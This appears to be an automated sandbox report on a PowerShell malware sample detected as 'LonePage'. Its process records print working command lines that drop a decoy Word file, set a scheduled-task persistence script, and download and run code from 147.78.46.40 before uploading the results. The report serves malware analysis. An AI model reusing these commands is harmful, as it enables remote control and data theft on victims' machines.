                                                Sep 30, 2024 15:32:08.082216978 CEST3766249735147.78.46.40192.168.2.6
                                                Sep 30, 2024 15:32:08.084106922 CEST4973537662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:32:08.092461109 CEST4973537662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:32:08.095406055 CEST4979237662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:32:08.097223043 CEST3766249735147.78.46.40192.168.2.6
                                                Sep 30, 2024 15:32:08.100318909 CEST3766249792147.78.46.40192.168.2.6
                                                Sep 30, 2024 15:32:08.104186058 CEST4979237662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:32:08.104186058 CEST4979237662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:32:08.109391928 CEST3766249792147.78.46.40192.168.2.6
                                                Sep 30, 2024 15:32:29.454787016 CEST3766249792147.78.46.40192.168.2.6
                                                Sep 30, 2024 15:32:29.456176996 CEST4979237662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:32:29.456300020 CEST4979237662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:32:29.462394953 CEST3766249792147.78.46.40192.168.2.6

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Sep 30, 2024 15:31:48.038466930 CEST1.1.1.1192.168.2.60xd0c5No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • 147.78.46.40:37662

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649735147.78.46.40376623380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 30, 2024 15:31:46.706336975 CEST104OUTGET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1
                                                Host: 147.78.46.40:37662
                                                Connection: Keep-Alive


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649792147.78.46.40376623380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 30, 2024 15:32:08.104186058 CEST104OUTGET /xsSpQbSOGHyzMLxZ/page164/upgrade.txt HTTP/1.1
                                                Host: 147.78.46.40:37662
                                                Connection: Keep-Alive


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:09:31:09
                                                Start date:30/09/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\Return.docx -value $fil -encoding byte;&$home\appdata\local\temp\Return.docx;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi94c1NwUWJTT0dIeXpNTHhaL3BhZ2UxNjQvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UxNjQnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg0KDQo=';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
                                                Imagebase:0x7ff6e3d50000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000000.00000002.2370858356.0000023E33DA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000000.00000002.2370858356.0000023E33DE2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:09:31:09
                                                Start date:30/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:09:31:27
                                                Start date:30/09/2024
                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\Return.docx" /o ""
                                                Imagebase:0x510000
                                                File size:1'620'872 bytes
                                                MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:6
                                                Start time:09:31:27
                                                Start date:30/09/2024
                                                Path:C:\Windows\System32\schtasks.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f
                                                Imagebase:0x7ff772690000
                                                File size:235'008 bytes
                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:09:31:28
                                                Start date:30/09/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
                                                Imagebase:0x7ff742f30000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000007.00000002.2442208931.0000026E1AF45000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000007.00000002.2442050583.0000026E1AE28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000007.00000002.2442050583.0000026E1AE8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 00000007.00000002.2442050583.0000026E1AE55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:09:31:31
                                                Start date:30/09/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                Imagebase:0x7ff7403e0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:14
                                                Start time:09:31:34
                                                Start date:30/09/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}
                                                Imagebase:0x7ff6e3d50000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000E.00000002.2976704530.0000020A282B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000E.00000002.3043184552.0000020A42273000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000E.00000002.2978895978.0000020A29EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_LonePage, Description: Yara detected LonePage, Source: 0000000E.00000002.2978895978.0000020A2B879000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:09:31:35
                                                Start date:30/09/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Executed Functions

                                                  Function 00007FFD347937B5 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2400068131.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction ID: 41852c4876ded81e17b3deca1bfc63602a5b7236c9c7182e18bbca9e767a4840
                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                  • Instruction Fuzzy Hash: 6901677121CB0D8FD744EF0CE491AA6B7E0FB99364F10056DE58AC3651D636E882CB45

                                                  Non-executed Functions

                                                  Function 00007FFD3479394D Relevance: .2, Instructions: 211COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2400068131.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
